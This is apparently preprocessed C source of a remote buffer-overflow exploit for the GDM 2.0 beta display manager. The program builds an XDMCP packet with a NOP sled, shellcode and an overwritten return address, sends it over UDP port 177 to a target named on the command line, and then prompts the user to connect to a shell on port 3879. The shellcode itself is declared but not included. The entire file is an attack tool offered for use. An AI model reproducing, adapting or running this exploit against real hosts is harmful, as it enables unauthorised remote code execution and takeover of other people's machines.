
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; void* sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int buffy ;
typedef int big_buffy ;


 int AF_INET ;
 int NOP ;
 int SOCK_DGRAM ;
 int atoi (char*) ;
 int bzero (char*,int) ;
 int close (int) ;
 char* code ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int ) ;
 void* htons (int) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int ,int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int resolve (char*) ;
 int socket (int ,int ,int ) ;
 int strlen (char*) ;
 int write (int,char*,int) ;

int main (int argc, char **argv)
{
  char uhm;
  int nadine;
  short blah[6];
  char buffy[1400];


  unsigned long addy;
  struct sockaddr_in stephanie;
  char big_buffy[sizeof(buffy)+12];

  if (argc < 3)
  {
    printf("\nGDM 2.0betaX exploit by AbraxaS (abraxas@sekure.de)"
           "\nUsage: %s [target] [offset]\n", argv[0]);
    exit(0);
  }

  addy = 0xbffff8c0-atoi(argv[2]);

  stephanie.sin_family = AF_INET;
  stephanie.sin_port = htons (177);
  stephanie.sin_addr.s_addr = resolve(argv[1]);
  nadine = socket (AF_INET, SOCK_DGRAM, 0);

  if (connect(nadine,(struct sockaddr *)&stephanie,sizeof(struct
sockaddr))<0)
  {
    perror("Connect"); exit(0);
  }


  memset(buffy, NOP, sizeof(buffy));

  bzero(big_buffy, sizeof(big_buffy));






  blah[0] = htons(1);

  blah[1] = htons(4);

  blah[2] = htons(5+sizeof(buffy));

  blah[3] = htons(sizeof(buffy));

  blah[4] = htons(0);

  blah[5] = htons(0);

  *(short *)&big_buffy[0]=blah[0];
  *(short *)&big_buffy[2]=blah[1];
  *(short *)&big_buffy[4]=blah[2];
  *(short *)&big_buffy[6]=blah[3];
  *(short *)&big_buffy[sizeof(buffy)+8]=blah[4];
  *(short *)&big_buffy[sizeof(buffy)+10]=blah[5];



  memcpy(buffy+sizeof(buffy)-strlen(code), code, strlen(code));


  *(long *)&buffy[0] = 0x0100007f;
  *(long *)&buffy[4] = 0x00000000;
  *(long *)&buffy[8] = 0x00000000;


  *(long *)&buffy[32]=addy;


  memcpy(big_buffy+8, buffy, sizeof(buffy));


  write(nadine, big_buffy, sizeof(big_buffy));

  printf("\nConnect to %s, port 3879 now.", argv[1]);
  printf("\nBut behave :) --abraxas\n");

  close(nadine);

}
